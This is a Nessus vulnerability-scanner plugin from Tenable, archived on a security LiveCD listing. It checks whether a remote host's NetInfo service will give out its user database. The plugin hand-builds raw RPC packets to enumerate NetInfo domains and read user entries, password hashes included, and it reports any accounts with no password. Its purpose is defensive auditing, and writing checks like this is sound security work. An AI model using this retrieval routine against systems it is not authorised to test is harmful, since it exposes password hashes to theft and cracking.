home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / netinfo_passwd.nasl

< prev

next >

Wrap

Text File  |  2005-01-14  |  9KB  |  397 lines

---

1. #
2. # This script is (C) Tenable Network Security
3. #
4.  
5. if(description)
6. {
7.  script_id(11898);
8.  script_bugtraq_id(2953);
9.  script_version("$Revision: 1.7 $");
10.  
11.  name["english"] = "Obtain /etc/passwd using NetInfo";
12.  
13.  script_name(english:name["english"]);
14.  
15.  desc["english"] = "
16. This script attempts to read the password file of the remote
17. host by using NetInfo.";
18.  
19.  
20.  script_description(english:desc["english"]);
21.  
22.  summary["english"] = "Uses NetInfo to read /etc/passwd remotely";
23.  
24.  script_summary(english:summary["english"]);
25.  
26.  script_category(ACT_GATHER_INFO);
27.  
28.  script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security");
29.  family["english"] = "General";
30.  script_family(english:family["english"]);
31.  script_dependencies("rpc_portmap.nasl", "netinfo_detect.nasl");
32.  exit(0);
33. }
34.  
35. function get_rpc_port(protocol)
36. { 
37.  local_var    broken, req, soc, r, port;
38.  local_var    a, b, c, d, p_a, p_b, p_c, p_d, pt_a, pt_b, pt_c, pt_d;
39.  
40.  
41.  
42.  a = rand() % 255;
43.  b = rand() % 255;
44.  c = rand() % 255;
45.  d = rand() % 255;
46.  
47.  p_a = program / 16777216;     p_a = p_a % 256;
48.  p_b = program / 65356;     p_b = p_b % 256;
49.  p_c = program / 256;       p_c = p_c % 256;
50.  p_d = program % 256;
51.  
52.  pt_a = protocol / 16777216; pt_a = pt_a % 256;
53.  pt_b = protocol / 65535   ; pt_b = pt_b % 256;
54.  pt_c = protocol / 256;    ; pt_c = pt_c % 256;
55.  pt_d = protocol % 256;
56.  
57.  
58.  req = raw_string(a,     b,     c,     d,     # XID
59.            0x00, 0x00, 0x00, 0x00,    # Msg type: call
60.           0x00, 0x00, 0x00, 0x02,    # RPC Version
61.           0x00, 0x01, 0x86, 0xA0,    # Program
62.           0x00, 0x00, 0x00, 0x02,    # Program version
63.           0x00, 0x00, 0x00, 0x03,    # Procedure
64.           0x00, 0x00, 0x00, 0x00,    # Credentials - flavor
65.           0x00, 0x00, 0x00, 0x00,     # Credentials - length
66.           0x00, 0x00, 0x00, 0x00,    # Verifier - Flavor
67.           0x00, 0x00, 0x00, 0x00,    # Verifier - Length
68.           
69.           0x0b, 0xed, 0x48, 0xa1,    # Program
70.           0xFF, 0xFF, 0xFF, 0xFF,    # Version (any)
71.           pt_a, pt_b, pt_c, pt_d,    # Proto (udp)
72.           0x00, 0x00, 0x00, 0x00    # Port
73.            );
74.     
75.       
76.   port = int(get_kb_item("rpc/portmap"));
77.   if(port == 0)port = 111;
78.        
79.       
80.  broken = get_kb_item(string("/tmp/rpc/noportmap/", port));
81.  if(broken)return(0);
82.  
83.        
84.  soc = open_sock_udp(port);
85.  send(socket:soc, data:req);
86.  r = recv(socket:soc, length:1024);
87.  
88.  close(soc);
89.  if(!r)
90.  {
91.   set_kb_item(name:string("/tmp/rpc/noportmap/", port), value:TRUE);
92.   return(0);
93.  }
94.  
95.  if(strlen(r) < 28)
96.   return(0);
97.  else
98.   {
99.    p_d = ord(r[27]);
100.    p_c = ord(r[26]);
101.    p_b = ord(r[25]);
102.    p_a = ord(r[24]);
103.    port = p_a;
104.    port = port * 256;
105.    port = port +p_b; 
106.    port = port * 256;
107.    port = port + p_c; 
108.    port = port * 256;
109.    port = port + p_d;
110.    return(port);
111.   }
112. }
113.  
114.  
115.  
116.  
117.  
118. function netinfo_recv(socket)
119. {
120.  local_var buf, len;
121.  
122.  buf = recv(socket:soc, length:4);
123.  if(strlen(buf) < 4)return NULL;
124.  
125.  len = ord(buf[3]) + ord(buf[2])*256;
126.  
127.  buf += recv(socket:soc, length:len);
128.  return buf;
129. }
130.  
131.  
132. function decode_strings(reply)
133. {
134.  local_var len, pad, start;
135.  local_var ret, str, value;
136.  
137.  ret = make_list();
138.  start = 46;
139.   
140.  while ( TRUE )
141.  {
142.  if(start > strlen(reply))break;
143.  len = ord(reply[start]) * 256 + ord(reply[start+1]);
144.  start += 2;
145.  str = substr(reply, start, start + len - 1);
146.  if( strlen(str) % 4 ) pad = 4 - strlen(str) % 4;
147.  else pad = 0;
148.  start += len + 6 + pad;
149.  len = ord(reply[start]) * 256 + ord(reply[start+1]);
150.  start += 2;
151.  value = substr(reply, start, start + len - 1);
152.  if( strlen(value) % 4 ) pad = 4 - strlen(value) % 4;
153.  else pad = 0;
154.  start += len + 2 + pad;
155.  ret[str] = value;
156.  }
157.  return ret;
158.  
159. }
160.  
161.  
162. report = "";
163. passwdless = "";
164.  
165.  
166. rpcport = get_rpc_port(protocol:IPPROTO_TCP);
167. if ( rpcport && get_port_state(rpcport))
168. {
169.  soc = open_sock_tcp(rpcport);
170.  if (  soc ) 
171.  {
172.   req = raw_string(0x80, 0x00, 0x00, 0x28, 0x11, 0xe0, 0x40, 0x95,
173.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
174.          0x0b, 0xed, 0x48, 0xa1, 0x00, 0x00, 0x00, 0x01,
175.          0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,
176.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
177.          0x00, 0x00, 0x00, 0x00);
178.  
179.  send(socket:soc, data:req);
180.  r = netinfo_recv(socket:soc);
181.  close(soc);
182.  if(strlen(r) > 35)
183.  {
184.   num_domains = ord(r[35]);
185.   start = 38;
186.   for ( i = 0 ; i < num_domains ; i ++ )
187.    {
188.    if(start > strlen(r))break;
189.    len = ord(r[start]) * 256 + ord(r[start+1]);
190.    start += 2;
191.    domain[i] = substr(r, start, start + len - 1);
192.    start += len + 10;
193.    if(len % 4)start += 4 - (len % 4);
194.    }
195.   }
196.  }
197. }
198.  
199. rpcport = get_rpc_port(protocol:IPPROTO_UDP);
200. flag = 0;
201. if ( rpcport )
202. {
203.  for ( n = 0 ; n < num_domains ; n ++ )
204.  {
205.  soc = open_sock_udp(rpcport);
206.  l_lo = strlen(domain[n]) % 256;
207.  l_hi = strlen(domain[n]) / 256;
208.  r = raw_string(0x68, 0xc1, 0x58, 0x98, 0x00, 0x00, 0x00, 0x00,
209.         0x00, 0x00, 0x00, 0x02, 0x0b, 0xed, 0x48, 0xa1,
210.         0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03,
211.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
212.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
213.         0x00, 0x00, l_hi, l_lo) + domain[n];
214.  if(strlen(domain[n]) % 4)r += crap(data:raw_string(0), length:4-(strlen(domain[n]) % 4));
215.  send(socket:soc, data:r);
216.  r = recv(socket:soc, length:4096);
217.  close(soc);
218.  if ( !r ) break;
219.  else flag = 1;
220.  
221.  port = ord(r[strlen(r) - 2]) * 256 + ord(r[strlen(r) - 1]);
222.  domain_port[domain[n]] = port;
223.  }
224. }
225.  
226. #
227. # If we can not connect to nibindd, then we brute force
228. # our way by connecting to every port on which we KNOW that
229. # netinfo is listening.
230. #
231. if ( ! flag )
232. {
233.  ports = get_kb_list("Services/netinfo");
234.  if(isnull(ports))exit(0);
235.  else ports = make_list(ports);
236.  foreach p (ports)
237.  {
238.   domain_port["unknown_on_port_" + string(p)] = p;
239.  }
240. }
241.  
242. foreach dom (keys(domain_port))
243. {
244.  port = domain_port[dom];
245.  if ( get_port_state(port) )
246.  {
247.  soc = open_sock_tcp(port);
248.  if( soc ) 
249.  {
250.  req = raw_string(0x80, 0x00, 0x00, 0x28, 0x15, 0xeb, 0x49, 0x80,
251.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
252.          0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
253.          0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
254.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
255.          0x00, 0x00, 0x00, 0x00);
256.  
257. send(socket:soc, data:req);
258. r = netinfo_recv(socket:soc);
259.  
260.  
261.  
262. req = raw_string(0x80, 0x00, 0x00, 0x28, 0x15, 0xeb, 0x49, 0x7f,
263.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
264.          0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
265.          0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
266.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
267.          0x00, 0x00, 0x00, 0x00);
268.  
269. send(socket:soc, data:req);
270. r = netinfo_recv(socket:soc);
271.  
272.  
273.  
274. #
275. # Request the users map
276. # 
277.  
278. req = raw_string(0x80, 0x00, 0x00, 0x44, 0x15, 0xeb, 0x49, 0x7e,
279.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
280.          0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
281.          0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x00, 0x00,
282.           0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
283.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
284.          0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x04,
285.              0x6e, 0x61, 0x6d, 0x65, 0x00, 0x00, 0x00, 0x05,
286.          0x75, 0x73, 0x65, 0x72, 0x73, 0x00, 0x00, 0x00);
287.  
288. send(socket:soc, data:req);
289. r = netinfo_recv(socket:soc);
290.  
291. if ( r )
292. {
293. req = raw_string(0x80, 0x00, 0x00, 0x30, 0x15, 0xeb, 0x49, 0x7d,
294.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
295.          0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
296.          0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00,
297.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
298.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
299.          0x00, 0x00, 0x00, ord(r[strlen(r) - 1]));
300.  
301. send(socket:soc, data:req);
302. r = netinfo_recv(socket:soc);
303. }
304.  
305. if ( r )
306. {
307. req = raw_string(0x80, 0x00, 0x00, 0x30, 0x15, 0xeb, 0x49, 0x7c,
308.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
309.          0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
310.          0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00,
311.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
312.          0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
313.          0x00, 0x00, 0x00, ord(r[strlen(r) - 1]));
314.  
315.  
316. send(socket:soc, data:req);
317. r = netinfo_recv(socket:soc);
318. }
319.  
320. if(strlen(r) > 35)
321.  {
322. num_users = ord(r[35]);
323.  
324.  
325. j = 0;
326. for(i=0;i<num_users*4;i+=4)
327. {
328.  if(40 + i > strlen(r))break;
329.  users[j] = substr(r, 36 + i, 39 + i);
330.  j++;
331. }
332.  
333. users[j] = NULL;
334.  
335. for ( i = 0 ; i < num_users ; i ++ )
336. {
337.  req = raw_string(0x80, 0x00, 0x00, 0x30, 0x15, 0xeb, 0x49, 0x7b,
338.           0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
339.           0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
340.           0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00,
341.           0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
342.           0x00, 0x00, 0x00, 0x00) + users[i] + raw_string(
343.           0x00, 0x00, 0x00, 0x0c);
344.  send(socket:soc, data:req);
345.  r = netinfo_recv(socket:soc);
346.  user = decode_strings(reply:r);
347.  if(user["name"] && user["uid"])
348.  {
349.  if ( flag == 0 )
350.  {
351.  report += ". In domain '" + dom + "' :
352.  
353. ";
354.  flag = 1;
355.  }
356.   
357.  report += string(user["name"], ":", user["passwd"], ":", user["uid"], ":", user["gid"], ":", user["realname"], ":", user["home"], ":", user["shell"], "\n");
358.  if(strlen(user["passwd"]) == 0 )
359.   {
360.   passwdless += '  . ' + user["name"] + '\n';
361.   }
362.  }
363.  }
364.  }
365.  }
366. }
367.  flag = 0;
368.  
369. }
370.  
371.  
372.  
373. if(strlen(report))
374. {
375.  report = "
376. Using NetInfo, it was possible to obtain the password file of the remote host
377. by querying it directly. The content of this file is :
378.  
379. " + report + "
380.  
381. An attacker may use it to set up a brute force attack to crack the 
382. passwords contained in the file, and then use the gained passwords to
383. login into the remote host, either remotely or locally";
384.  
385.  
386.  
387. if(strlen(passwdless)) 
388. {
389.  report += "
390.  
391. Note that the following accounts have NO PASSWORD set :
392. " + passwdless;
393.     }
394.  
395.  security_hole(port:port, data:report);
396.  }
397.